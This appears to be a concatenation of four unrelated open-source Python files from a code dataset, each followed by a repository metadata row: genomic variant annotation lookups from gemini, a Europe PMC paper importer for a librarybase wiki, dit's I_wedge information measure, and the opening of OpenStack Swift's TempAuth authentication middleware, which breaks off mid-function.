if "|" not in sig_code:
try:
return self.sig_code_map[sig_code]
except KeyError:
return None
else:
sigs = set(sig_code.split('|'))
# e.g., 255|255|255
if len(sigs) == 1:
try:
return self.sig_code_map[sigs.pop()]
except KeyError:
return None
# e.g., 1|5|255
else:
return "mixed"
ESPInfo = collections.namedtuple("ESPInfo",
"found \
aaf_EA \
aaf_AA \
aaf_ALL \
exome_chip")
ENCODEDnaseIClusters = collections.namedtuple("ENCODEDnaseIClusters",
"cell_count \
cell_list")
ENCODESegInfo = collections.namedtuple("ENCODESegInfo",
"gm12878 \
h1hesc \
helas3 \
hepg2 \
huvec \
k562")
ThousandGInfo = collections.namedtuple("ThousandGInfo",
"found \
aaf_ALL \
aaf_AMR \
aaf_ASN \
aaf_AFR \
aaf_EUR")
def load_annos( args ):
"""
Populate a dictionary of Tabixfile handles for
each annotation file. Other modules can then
access a given handle and fetch data from it
as follows:
dbsnp_handle = annotations.annos['dbsnp']
hits = dbsnp_handle.fetch(chrom, start, end)
"""
anno_files = get_anno_files( args )
for anno in anno_files:
try:
# .gz denotes Tabix files.
if anno_files[anno].endswith(".gz"):
annos[anno] = pysam.Tabixfile(anno_files[anno])
# .bw denotes BigWig files.
elif anno_files[anno].endswith(".bw"):
annos[anno] = BigWigFile( open( anno_files[anno] ) )
except IOError:
sys.exit("Gemini cannot open this annotation file: %s. \n"
"Have you installed the annotation files? If so, "
"have they been moved or deleted? Exiting...\n\n"
"For more details:\n\t"
"http://gemini.readthedocs.org/en/latest/content/"
"#installation.html\#installing-annotation-files\n"
% anno_files[anno])
# ## Standard access to Tabix indexed files
def _get_hits(coords, annotation, parser_type):
"""Retrieve BED information, recovering if BED annotation file does have a chromosome.
"""
if parser_type == "bed":
parser = pysam.asBed()
elif parser_type == "vcf":
parser = pysam.asVCF()
elif parser_type == "tuple":
parser = pysam.asTuple()
elif parser_type is None:
parser = None
else:
raise ValueError("Unexpected parser type: %s" % parser)
chrom, start, end = coords
try:
hit_iter = annotation.fetch(str(chrom), start, end, parser=parser)
# catch invalid region errors raised by ctabix
except ValueError:
hit_iter = []
# recent versions of pysam return KeyError
except KeyError:
hit_iter = []
return hit_iter
def _get_bw_summary(coords, annotation):
"""Return summary of BigWig scores in an interval
"""
chrom, start, end = coords
try:
return annotation.summarize(str(chrom), start, end, end-start).min_val[0]
except AttributeError:
return None
def _get_chr_as_grch37(chrom):
if chrom in ["chrM"]:
return "MT"
return chrom if not chrom.startswith("chr") else chrom[3:]
def _get_chr_as_ucsc(chrom):
return chrom if chrom.startswith("chr") else "chr" + chrom
def guess_contig_naming(anno):
"""Guess which contig naming scheme a given annotation file uses.
"""
chr_names = [x for x in anno.contigs if x.startswith("chr")]
if len(chr_names) > 0:
return "ucsc"
else:
return "grch37"
def _get_var_coords(var, naming):
"""Retrieve variant coordinates from multiple input objects.
"""
if isinstance(var, dict) or isinstance(var, sqlite3.Row):
chrom = var["chrom"]
start = int(var["start"])
end = int(var["end"])
else:
chrom = var.CHROM
start = var.start
end = var.end
if naming == "ucsc":
chrom = _get_chr_as_ucsc(chrom)
elif naming == "grch37":
chrom = _get_chr_as_grch37(chrom)
return chrom, start, end
def _get_cadd_scores(var, labels, hit):
"""
get cadd scores
"""
raw = hit[3].split(",")
scaled = hit[4].split(",")
p = re.compile(str(var.ALT[0]))
for m in p.finditer(str(labels[hit[2]])):
pos = m.start()
return raw[pos], scaled[pos]
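# CADD tabix rows are (chrom, pos, ref, raw, scaled); the raw/scaled columns are
# comma-separated, one value per possible alternate allele, indexed by the allele's
# position in the `labels` string for that reference base (see get_cadd_scores).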
def annotations_in_region(var, anno, parser_type=None, naming="ucsc"):
"""Iterator of annotations found in a genomic region.
- var: PyVCF object or database query with chromosome, start and end.
- anno: pysam Tabix annotation file or string to reference
a standard annotation
- parser_type: string specifying the filetype of the tabix file
- naming: chromosome naming scheme used, ucsc or grch37
"""
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_hits(coords, anno, parser_type)
def bigwig_summary(var, anno, naming="ucsc"):
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_bw_summary(coords, anno)
# ## Track-specific annotations
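# Each get_* helper below takes a variant (a PyVCF record or a gemini database row)
# and queries the tabix/BigWig handles loaded by load_annos().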
def get_cpg_island_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a CpG island
"""
for hit in annotations_in_region(var, "cpg_island", "bed"):
return True
return False
# def get_dbNSFP_info(var, impacts):
# """
# Returns Polyphen, SIFT, etc. from dbNSFP annotation file.
# One prediction per transcript.
# LIMITATION: only handles bi-allelic loci
# """
# # is this variant predicted to be nonsynonymous for any of the transcripts?
# # if not, we can skip dnNSFP.
# non_syn_impacts = [imp for imp in impacts \
# if imp.consequence == 'non_syn_coding']
# if len(non_syn_impacts) > 0:
# for hit in annotations_in_region(var, "dbnsfp", parser_type="tuple", naming="grch37"):
# if var.POS == int(hit[1]) and \
# var.REF == hit[2] and \
# var.ALT[0] == hit[3]:
# transcripts = hit[7].split(';')
# aapos = hit[8].split(';')
# pp_scores = hit[11].split(';')
# if len(transcripts) != len(pp_scores):
# print var.POS, var.REF, var.ALT[0], [i.transcript for i in non_syn_impacts], \
# [i.polyphen_pred for i in non_syn_impacts], [i.polyphen_score for i in non_syn_impacts], \
# hit[7], hit[8], hit[11], hit[12]
# else:
# pass
def get_cyto_info(var):
"""
Returns a comma-separated list of the chromosomal
cytobands that a variant overlaps.
"""
cyto_band = ''
for hit in annotations_in_region(var, "cytoband", "bed"):
if len(cyto_band) > 0:
cyto_band += "," + hit.contig + hit.name
else:
cyto_band += hit.contig + hit.name
return cyto_band if len(cyto_band) > 0 else None
def get_gerp_bp(var):
"""
Returns a summary of the GERP scores for the variant.
"""
if "gerp_bp" not in annos:
raise IOError("Need to download BigWig file with GERP scores per base pair. "
"Run `gemini update --dataonly --extra gerp_bp")
gerp = bigwig_summary(var, "gerp_bp")
return gerp
def get_gerp_elements(var):
"""
Returns the GERP element information.
"""
p_vals = []
for hit in annotations_in_region(var, "gerp_elements", "tuple"):
p_vals.append(hit[3])
if len(p_vals) == 1:
return p_vals[0]
elif len(p_vals) > 1:
return min(float(p) for p in p_vals)
else:
return None
def get_vista_enhancers(var):
"""
Returns the VISTA enhancer information.
"""
vista_enhancers = []
for hit in annotations_in_region(var, "vista_enhancers", "tuple"):
vista_enhancers.append(hit[4])
return ",".join(vista_enhancers) if len(vista_enhancers) > 0 else None
def get_cadd_scores(var):
"""
Returns the C-raw scores & scaled scores (CADD) to predict deleterious
    variants. Implemented only for SNVs.
"""
if "cadd_score" not in annos:
raise IOError("Need to download the CADD data file for deleteriousness."
"Run `gemini update --dataonly --extra cadd_score")
cadd_raw = cadd_scaled = None
labels = {"A":"CGT", "C":"AGT", "G":"ACT", "T":"ACG", "R":"ACGT", "M":"ACGT"}
for hit in annotations_in_region(var, "cadd_score", "tuple", "grch37"):
# we want exact position mapping here and not a range (end-start) as
# returned in hit (e.g. indels) & we do not want to consider del & ins
if str(hit[1]) == str(var.POS) and len(var.REF) == 1 and \
len(var.ALT[0]) == 1:
if str(hit[2]) == var.REF and str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
# consider ref cases with ambiguity codes R (G,A) and M (A,C)
elif ((str(hit[2]) == 'R' and var.REF in('G','A')) or \
(str(hit[2]) == 'M' and var.REF in('A','C'))) and \
str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
return (cadd_raw, cadd_scaled)
def get_pfamA_domains(var):
"""
Returns pfamA domains that a variant overlaps
"""
pfam_domain = []
for hit in annotations_in_region(var, "pfam_domain", "bed"):
pfam_domain.append(hit.name)
return ",".join(pfam_domain) if len(pfam_domain) > 0 else None
def get_cosmic_info(var):
"""
Returns a list of COSMIC ids associated with given variant
E.g. from COSMIC VCF
#CHROM POS ID REF ALT QUAL FILTER INFO
chrM 1747 COSN408408 G A . . .
chrM 2700 COSN408409 G A . . .
chr1 42880262 COSM464635 G C . . AA=p.D224H;CDS=c.670G>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880269 COSM909628 G A . . AA=p.G226D;CDS=c.677G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880284 COSM1502979 G T . . AA=p.C231F;CDS=c.692G>T;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880318 COSM681351 T A . . AA=p.F242L;CDS=c.726T>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880337 COSM464636 G A . . AA=p.D249N;CDS=c.745G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880384 COSM909629 T C . . AA=p.N264N;CDS=c.792T>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880415 COSM909630 G C . . AA=p.G275R;CDS=c.823G>C;CNT=1;GENE=RIMKLA;STRAND=+
"""
    # collect the ids of all overlapping COSMIC variants
cosmic_ids = []
for hit in annotations_in_region(var, "cosmic", "vcf", "ucsc"):
cosmic_ids.append(hit.id)
return ",".join(cosmic_ids) if len(cosmic_ids) > 0 else None
def get_clinvar_info(var):
"""
Returns a suite of annotations from ClinVar
ClinVarInfo named_tuple:
--------------------------------------------------------------------------
# clinvar_dbsource = CLNSRC=OMIM Allelic Variant;
# clinvar_dbsource_id = CLNSRCID=103320.0001;
# clinvar_origin = CLNORIGIN=1
# clinvar_sig = CLNSIG=5
# clinvar_dsdb = CLNDSDB=GeneReviews:NCBI:OMIM:Orphanet;
# clinvar_dsdbid = CLNDSDBID=NBK1168:C1850792:254300:590;
# clinvar_disease_name = CLNDBN=Myasthenia\x2c limb-girdle\x2c familial;
# clinvar_disease_acc = CLNACC=RCV000019902.1
# clinvar_in_omim = OM
# clinvar_in_locus_spec_db = LSD
# clinvar_on_diag_assay = CDA
"""
clinvar = ClinVarInfo()
    # report the first overlapping ClinVar variant (most often, just one).
for hit in annotations_in_region(var, "clinvar", "vcf", "grch37"):
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
else:
info_map[info] = True
raw_dbsource = info_map['CLNSRC'] or None
#interpret 8-bit strings and convert to plain text
clinvar.clinvar_dbsource = unidecode(raw_dbsource.decode('utf-8'))
clinvar.clinvar_dbsource_id = info_map['CLNSRCID'] or None
clinvar.clinvar_origin = \
clinvar.lookup_clinvar_origin(info_map['CLNORIGIN'])
clinvar.clinvar_sig = \
clinvar.lookup_clinvar_significance(info_map['CLNSIG'])
clinvar.clinvar_dsdb = info_map['CLNDSDB'] or None
clinvar.clinvar_dsdbid = info_map['CLNDSDBID'] or None
# Remap all unicode characters into plain text string replacements
raw_disease_name = info_map['CLNDBN'] or None
clinvar.clinvar_disease_name = unidecode(raw_disease_name.decode('utf-8'))
# Clinvar represents commas as \x2c. Make them commas.
clinvar.clinvar_disease_name = clinvar.clinvar_disease_name.decode('string_escape')
clinvar.clinvar_disease_acc = info_map['CLNACC'] or None
clinvar.clinvar_in_omim = 1 if 'OM' in info_map else 0
clinvar.clinvar_in_locus_spec_db = 1 if 'LSD' in info_map else 0
clinvar.clinvar_on_diag_assay = 1 if 'CDA' in info_map else 0
return clinvar
def get_dbsnp_info(var):
"""
Returns a suite of annotations from dbSNP
"""
rs_ids = []
for hit in annotations_in_region(var, "dbsnp", "vcf", "grch37"):
rs_ids.append(hit.id)
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
return ",".join(rs_ids) if len(rs_ids) > 0 else None
def get_esp_info(var):
"""
Returns a suite of annotations from the ESP project
ESP reports the minor allele frequency (MAF), not the
alternate allele frequency (AAF). We must therefore figure
    out whether the reference or alternate allele is the minor allele.
1 69496 rs150690004 G A . PASS DBSNP=dbSNP_134;EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549;MAF=0.0296,0.604,0.2364;GTS=AA,AG,GG;EA_GTC=0,2,3381;AA_GTC=5,13,1886;GTC=5,15,5267;DP=91;GL=OR4F5;CP=0.5;CG=2.3;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=SER/GLY;PP=136/306;CDP=406;GS=56;PH=benign
1 69511 rs75062661 A G . PASS DBSNP=dbSNP_131;EA_AC=5337,677;AA_AC=1937,1623;TAC=7274,2300;MAF=11.2571,45.5899,24.0234;GTS=GG,GA,AA;EA_GTC=2430,477,100;AA_GTC=784,369,627;GTC=3214,846,727;DP=69;GL=OR4F5;CP=1.0;CG=1.1;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=ALA/THR;PP=141/306;CDP=421;GS=58;PH=benign
"""
aaf_EA = aaf_AA = aaf_ALL = None
maf = fetched = con = []
exome_chip = False
found = False
info_map = {}
for hit in annotations_in_region(var, "esp", "vcf", "grch37"):
if hit.contig not in ['Y']:
fetched.append(hit)
# We need a single ESP entry for a variant
if fetched != None and len(fetched) == 1 and \
hit.alt == var.ALT[0] and hit.ref == var.REF:
found = True
# loads each VCF INFO key/value pair into a DICT
for info in hit.info.split(";"):
if info.find("=") > 0:
# splits on first occurence of '='
# useful to handle valuerror: too many values to unpack (e.g (a,b) = split(",", (a,b,c,d)) for cases like
# SA=http://www.ncbi.nlm.nih.gov/sites/varvu?gene=4524&%3Brs=1801131|http://omim.org/entry/607093#0004
(key, value) = info.split("=", 1)
info_map[key] = value
# get the allele counts so that we can compute alternate allele frequencies
# example: EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549
if info_map.get('EA_AC') is not None:
lines = info_map['EA_AC'].split(",")
aaf_EA = float(lines[0]) / (float(lines[0]) + float(lines[1]))
if info_map.get('AA_AC') is not None:
lines = info_map['AA_AC'].split(",")
aaf_AA = float(lines[0]) / (float(lines[0]) + float(lines[1]))
if info_map.get('TAC') is not None:
lines = info_map['TAC'].split(",")
aaf_ALL = float(lines[0]) / (float(lines[0]) + float(lines[1]))
                # Is the SNP on a human exome chip?
if info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "no":
exome_chip = 0
elif info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "yes":
exome_chip = 1
return ESPInfo(found, aaf_EA, aaf_AA, aaf_ALL, exome_chip)
def get_1000G_info(var):
"""
Returns a suite of annotations from the 1000 Genomes project
"""
#fetched = []
info_map = {}
found = False
for hit in annotations_in_region(var, "1000g", "vcf", "grch37"):
        # We need to ensure we are dealing with the exact same variant
# based on position and the alleles present.
if var.start == hit.pos and \
var.ALT[0] == hit.alt and \
hit.ref == var.REF:
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
found = True
return ThousandGInfo(found, info_map.get('AF'), info_map.get('AMR_AF'),
info_map.get('ASN_AF'), info_map.get('AFR_AF'),
info_map.get('EUR_AF'))
def get_rmsk_info(var):
"""
Returns a comma-separated list of annotated repeats
that overlap a variant. Derived from the UCSC rmsk track
"""
rmsk_hits = []
for hit in annotations_in_region(var, "rmsk", "bed"):
rmsk_hits.append(hit.name)
return ",".join(rmsk_hits) if len(rmsk_hits) > 0 else None
def get_segdup_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a known segmental duplication.
"""
for hit in annotations_in_region(var, "segdup", "bed"):
return True
return False
def get_conservation_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a conserved region as defined
by the 29-way mammalian conservation study.
http://www.nature.com/nature/journal/v478/n7370/full/nature10530.html
Data file provenance:
http://www.broadinstitute.org/ftp/pub/assemblies/mammals/29mammals/ \
29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.gz
# Script to convert for gemini:
gemini/annotation_provenance/make-29way-conservation.sh
"""
for hit in annotations_in_region(var, "conserved", "bed"):
return True
return False
def get_recomb_info(var):
"""
Returns the mean recombination rate at the site.
"""
count = 0
tot_rate = 0.0
for hit in annotations_in_region(var, "recomb", "bed"):
if hit.contig not in ['chrY']:
# recomb rate file is in bedgraph format.
# pysam will store the rate in the "name" field
count += 1
tot_rate += float(hit.name)
return float(tot_rate) / float(count) if count > 0 else None
def _get_first_vcf_hit(hit_iter):
if hit_iter is not None:
hits = list(hit_iter)
if len(hits) > 0:
return hits[0]
def _get_vcf_info_attrs(hit):
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
return info_map
def get_gms(var):
"""Return Genome Mappability Scores for multiple technologies.
"""
techs = ["illumina", "solid", "iontorrent"]
GmsTechs = collections.namedtuple("GmsTechs", techs)
hit = _get_first_vcf_hit(
annotations_in_region(var, "gms", "vcf", "grch37"))
attr_map = _get_vcf_info_attrs(hit) if hit is not None else {}
return apply(GmsTechs,
[attr_map.get("GMS_{0}".format(x), None) for x in techs])
def get_grc(var):
"""Return GRC patched genome regions.
"""
regions = set()
for hit in annotations_in_region(var, "grc", "bed", "grch37"):
regions.add(hit.name)
return ",".join(sorted(list(regions))) if len(regions) > 0 else None
def get_cse(var):
"""Return if a variant is in a CSE: Context-specific error region.
"""
for hit in annotations_in_region(var, "cse", "bed", "grch37"):
return True
return False
def get_encode_tfbs(var):
"""
Returns a comma-separated list of transcription factors that were
observed to bind DNA in this region. Each hit in the list is constructed
as TF_CELLCOUNT, where:
TF is the transcription factor name
CELLCOUNT is the number of cells tested that had nonzero signals
NOTE: the annotation file is in BED format, but pysam doesn't
tolerate BED files with more than 12 fields, so we just use the base
tuple parser and grab the name column (4th column)
"""
tfbs = []
for hit in annotations_in_region(var, "encode_tfbs", "tuple"):
tfbs.append(hit[3] + "_" + hit[4])
if len(tfbs) > 0:
return ','.join(tfbs)
else:
return None
def get_encode_dnase_clusters(var):
"""
If a variant overlaps a DnaseI cluster, return the number of cell types
    that were found to have DnaseI HS in the given interval, as well
as a comma-separated list of each cell type:
Example data:
chr1 20042385 20042535 4 50.330600 8988t;K562;Osteobl;hTH1
chr1 20043060 20043210 3 12.450500 Gm12891;T47d;hESCT0
chr1 20043725 20043875 2 5.948180 Fibrobl;Fibrop
chr1 20044125 20044275 3 6.437350 HESC;Ips;hTH1
"""
for hit in annotations_in_region(var, "encode_dnase1", "tuple"):
return ENCODEDnaseIClusters(hit[3], hit[5])
return ENCODEDnaseIClusters(None, None)
def get_encode_consensus_segs(var):
"""
Queries a meta-BEDGRAPH of consensus ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
CTCF: CTCF-enriched element
E: Predicted enhancer
PF: Predicted promoter flanking region
R: Predicted repressed or low-activity region
TSS: Predicted promoter region including TSS
T: Predicted transcribed region
WE: Predicted weak enhancer or open chromatin cis-regulatory element
"""
for hit in annotations_in_region(var, "encode_consensus_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_segway_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_segway_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_chromhmm_segs(var):
"""
    Queries a meta-BEDGRAPH of ChromHMM ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_chromhmm_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_resources( args ):
"""Retrieve list of annotation resources loaded into gemini.
"""
anno_files = get_anno_files( args )
return [(n, os.path.basename(anno_files[n])) for n in sorted(anno_files.keys())]
| apache-2.0 | 5,353,853,671,318,104,000 | 37.726928 | 369 | 0.565338 | false |
tarrow/librarybase-pwb | addpapers.py | 1 | 1993 | import queryCiteFile
import librarybase
import pywikibot
from epmclib.getPMCID import getPMCID
from epmclib.exceptions import IDNotResolvedException
import queue
import threading
import time
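# Walks the cite file for rows with PMC ids, fetches basic metadata from Europe PMC
# via epmclib, and creates the corresponding journal article items on librarybase.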
def rununthreaded():
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for idx, citation in enumerate(citations[10513:]):
addpaper(idx, citation)
def runthreaded():
threads = []
for i in range(10):
        t = threading.Thread(target=worker)  # pass the function itself, do not call it here
t.start()
threads.append(t)
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
    for item in enumerate(citations[10513:]):
        q.put(item)  # each item is an (index, citation) tuple
q.join()
for i in range(10):
q.put(None)
for t in threads:
t.join()
def worker():
    while True:
        item = q.get()
        if item is None:
            # sentinel pushed by runthreaded(): stop this worker thread
            break
        idx, citation = item
        addpaper(idx, citation)
        q.task_done()
def addpaper( idx, citation ):
start=time.time()
print(citation)
if citation is None:
return
print('trying to add {} number {}'.format(citation[5], idx))
site = pywikibot.Site("librarybase", "librarybase")
item = librarybase.JournalArticlePage(site)
pmcidobj = getPMCID(citation[5])
try:
pmcidobj.getBBasicMetadata()
except IDNotResolvedException:
print('Couldn\'t find in EPMC:' + citation[5])
return
metadata = pmcidobj.metadata
print("Got metadata in:" + str(time.time()-start))
if not item.articleAlreadyExists(metadata['pmcid']):
print('Item doesn\'t seem to exist. Setting metadata for: ' + metadata['pmcid'])
item.setMetaData(metadata)
print("set metadata in" + str(time.time()-start))
else:
print("{} already exists. Doing nothing".format(metadata['pmcid']))
q=queue.Queue()
rununthreaded() | mit | 4,137,417,748,321,423,400 | 27.776119 | 92 | 0.60562 | false |
Autoplectic/dit | dit/pid/iwedge.py | 1 | 1110 | """
The I_wedge measure, as proposed by Griffith et al.
"""
from __future__ import division
from .pid import BasePID
from .. import Distribution
from ..algorithms import insert_meet
from ..multivariate import coinformation
class PID_GK(BasePID):
"""
The Griffith et al partial information decomposition.
This PID is known to produce negative partial information values.
"""
_name = "I_GK"
@staticmethod
def _measure(d, inputs, output):
"""
Compute I_wedge(inputs : output) = I(meet(inputs) : output)
Parameters
----------
d : Distribution
The distribution to compute i_wedge for.
inputs : iterable of iterables
The input variables.
output : iterable
The output variable.
Returns
-------
iwedge : float
The value of I_wedge.
"""
d = d.coalesce(inputs+(output,))
d = Distribution(d.outcomes, d.pmf, sample_space=d.outcomes)
d = insert_meet(d, -1, d.rvs[:-1])
return coinformation(d, [d.rvs[-2], d.rvs[-1]])
| bsd-3-clause | 7,420,420,584,193,200,000 | 24.227273 | 69 | 0.587387 | false |
pvo/swift | swift/common/middleware/tempauth.py | 1 | 21275 | # Copyright (c) 2011 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from time import gmtime, strftime, time
from traceback import format_exc
from urllib import quote, unquote
from uuid import uuid4
from hashlib import sha1
import hmac
import base64
from eventlet import Timeout
from webob import Response, Request
from webob.exc import HTTPBadRequest, HTTPForbidden, HTTPNotFound, \
HTTPUnauthorized
from swift.common.middleware.acl import clean_acl, parse_acl, referrer_allowed
from swift.common.utils import cache_from_env, get_logger, get_remote_client, \
split_path, TRUE_VALUES
class TempAuth(object):
"""
Test authentication and authorization system.
Add to your pipeline in proxy-server.conf, such as::
[pipeline:main]
pipeline = catch_errors cache tempauth proxy-server
Set account auto creation to true in proxy-server.conf::
[app:proxy-server]
account_autocreate = true
And add a tempauth filter section, such as::
[filter:tempauth]
use = egg:swift#tempauth
user_admin_admin = admin .admin .reseller_admin
user_test_tester = testing .admin
user_test2_tester2 = testing2 .admin
user_test_tester3 = testing3
See the proxy-server.conf-sample for more information.
:param app: The next WSGI app in the pipeline
:param conf: The dict of configuration values
"""
def __init__(self, app, conf):
self.app = app
self.conf = conf
self.logger = get_logger(conf, log_route='tempauth')
self.log_headers = conf.get('log_headers') == 'True'
self.reseller_prefix = conf.get('reseller_prefix', 'AUTH').strip()
if self.reseller_prefix and self.reseller_prefix[-1] != '_':
self.reseller_prefix += '_'
self.auth_prefix = conf.get('auth_prefix', '/auth/')
if not self.auth_prefix:
self.auth_prefix = '/auth/'
if self.auth_prefix[0] != '/':
self.auth_prefix = '/' + self.auth_prefix
if self.auth_prefix[-1] != '/':
self.auth_prefix += '/'
self.token_life = int(conf.get('token_life', 86400))
self.allowed_sync_hosts = [h.strip()
for h in conf.get('allowed_sync_hosts', '127.0.0.1').split(',')
if h.strip()]
self.allow_overrides = \
conf.get('allow_overrides', 't').lower() in TRUE_VALUES
self.users = {}
for conf_key in conf:
if conf_key.startswith('user_'):
values = conf[conf_key].split()
if not values:
raise ValueError('%s has no key set' % conf_key)
key = values.pop(0)
if values and '://' in values[-1]:
url = values.pop()
else:
url = 'https://' if 'cert_file' in conf else 'http://'
ip = conf.get('bind_ip', '127.0.0.1')
if ip == '0.0.0.0':
ip = '127.0.0.1'
url += ip
url += ':' + conf.get('bind_port', '8080') + '/v1/' + \
self.reseller_prefix + conf_key.split('_')[1]
self.users[conf_key.split('_', 1)[1].replace('_', ':')] = {
'key': key, 'url': url, 'groups': values}
def __call__(self, env, start_response):
"""
Accepts a standard WSGI application call, authenticating the request
and installing callback hooks for authorization and ACL header
validation. For an authenticated request, REMOTE_USER will be set to a
comma separated list of the user's groups.
With a non-empty reseller prefix, acts as the definitive auth service
for just tokens and accounts that begin with that prefix, but will deny
requests outside this prefix if no other auth middleware overrides it.
With an empty reseller prefix, acts as the definitive auth service only
for tokens that validate to a non-empty set of groups. For all other
requests, acts as the fallback auth service when no other auth
middleware overrides it.
Alternatively, if the request matches the self.auth_prefix, the request
will be routed through the internal auth request handler (self.handle).
This is to handle granting tokens, etc.
"""
if self.allow_overrides and env.get('swift.authorize_override', False):
return self.app(env, start_response)
if env.get('PATH_INFO', '').startswith(self.auth_prefix):
return self.handle(env, start_response)
s3 = env.get('HTTP_AUTHORIZATION')
token = env.get('HTTP_X_AUTH_TOKEN', env.get('HTTP_X_STORAGE_TOKEN'))
if s3 or (token and token.startswith(self.reseller_prefix)):
# Note: Empty reseller_prefix will match all tokens.
groups = self.get_groups(env, token)
if groups:
env['REMOTE_USER'] = groups
user = groups and groups.split(',', 1)[0] or ''
# We know the proxy logs the token, so we augment it just a bit
# to also log the authenticated user.
env['HTTP_X_AUTH_TOKEN'] = \
'%s,%s' % (user, 's3' if s3 else token)
env['swift.authorize'] = self.authorize
env['swift.clean_acl'] = clean_acl
else:
# Unauthorized token
if self.reseller_prefix:
# Because I know I'm the definitive auth for this token, I
# can deny it outright.
return HTTPUnauthorized()(env, start_response)
# Because I'm not certain if I'm the definitive auth for empty
# reseller_prefixed tokens, I won't overwrite swift.authorize.
elif 'swift.authorize' not in env:
env['swift.authorize'] = self.denied_response
else:
if self.reseller_prefix:
# With a non-empty reseller_prefix, I would like to be called
# back for anonymous access to accounts I know I'm the
# definitive auth for.
try:
version, rest = split_path(env.get('PATH_INFO', ''),
1, 2, True)
except ValueError:
version, rest = None, None
if rest and rest.startswith(self.reseller_prefix):
# Handle anonymous access to accounts I'm the definitive
# auth for.
env['swift.authorize'] = self.authorize
env['swift.clean_acl'] = clean_acl
# Not my token, not my account, I can't authorize this request,
# deny all is a good idea if not already set...
elif 'swift.authorize' not in env:
env['swift.authorize'] = self.denied_response
# Because I'm not certain if I'm the definitive auth for empty
# reseller_prefixed accounts, I won't overwrite swift.authorize.
elif 'swift.authorize' not in env:
env['swift.authorize'] = self.authorize
env['swift.clean_acl'] = clean_acl
return self.app(env, start_response)
def get_groups(self, env, token):
"""
Get groups for the given token.
:param env: The current WSGI environment dictionary.
:param token: Token to validate and return a group string for.
:returns: None if the token is invalid or a string containing a comma
separated list of groups the authenticated user is a member
of. The first group in the list is also considered a unique
identifier for that user.
"""
groups = None
memcache_client = cache_from_env(env)
if not memcache_client:
raise Exception('Memcache required')
memcache_token_key = '%s/token/%s' % (self.reseller_prefix, token)
cached_auth_data = memcache_client.get(memcache_token_key)
if cached_auth_data:
expires, groups = cached_auth_data
if expires < time():
groups = None
if env.get('HTTP_AUTHORIZATION'):
account_user, sign = \
env['HTTP_AUTHORIZATION'].split(' ')[1].rsplit(':', 1)
if account_user not in self.users:
return None
account, user = account_user.split(':', 1)
account_id = self.users[account_user]['url'].rsplit('/', 1)[-1]
path = env['PATH_INFO']
env['PATH_INFO'] = path.replace(account_user, account_id, 1)
msg = base64.urlsafe_b64decode(unquote(token))
key = self.users[account_user]['key']
s = base64.encodestring(hmac.new(key, msg, sha1).digest()).strip()
if s != sign:
return None
groups = [account, account_user]
groups.extend(self.users[account_user]['groups'])
if '.admin' in groups:
groups.remove('.admin')
groups.append(account_id)
groups = ','.join(groups)
return groups
def authorize(self, req):
"""
Returns None if the request is authorized to continue or a standard
WSGI response callable if not.
"""
try:
version, account, container, obj = split_path(req.path, 1, 4, True)
except ValueError:
return HTTPNotFound(request=req)
if not account or not account.startswith(self.reseller_prefix):
return self.denied_response(req)
user_groups = (req.remote_user or '').split(',')
